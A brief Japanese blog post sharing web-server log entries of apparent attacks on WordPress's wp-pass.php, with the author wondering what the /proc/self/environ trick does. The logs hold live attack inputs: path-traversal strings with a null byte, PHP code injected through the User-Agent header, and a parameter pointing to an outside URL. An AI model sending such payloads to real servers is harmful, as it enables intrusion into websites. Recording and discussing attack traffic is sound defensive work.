futuremix

WordPress の wp-pass.php を狙ったあやしいアクセスがありました。

xxx.xxx.xxx.xxx - - [13/Feb/2009:14:22:41 +0900] "GET /wp-pass.php?_wp_http_referer=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 302 - "-" "XXX<? echo \"w0000t\"; ?>XXX"
xxx.xxx.xxx.xxx - - [13/Feb/2009:14:22:44 +0900] "GET /wp-pass.php?_wp_http_referer=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 - "-" "XXX<? echo \"w0000t\"; ?>XXX"
116.121.201.xxx - - [13/Feb/2009:15:53:34 +0900] "GET /wp-pass.php?_wp_http_referer=http://www.jeugdskating.nl/****/** HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
116.121.201.xxx - - [13/Feb/2009:15:53:38 +0900] "GET /wp-pass.php?_wp_http_referer=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 302 - "-" "XXX<? echo \"w0000t\"; ?>XXX"
116.121.201.xxx - - [13/Feb/2009:15:53:39 +0900] "GET /wp-pass.php?_wp_http_referer=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 - "-" "XXX<? echo \"w0000t\"; ?>XXX"

似たような例として wp-pass.php狙いの怪しいアクセス というのがありました。どうやら以前 wp-pass.php にあった脆弱性（Bugtraq: Redirection Vulnerability in wp-pass.php, WordPress 2.2.1）を狙っているようです。

最新版にしていればスルーでよいのでしょうか。/proc/self/environ をリファラーとしてセットするというのはどういう攻撃なんでしょうね。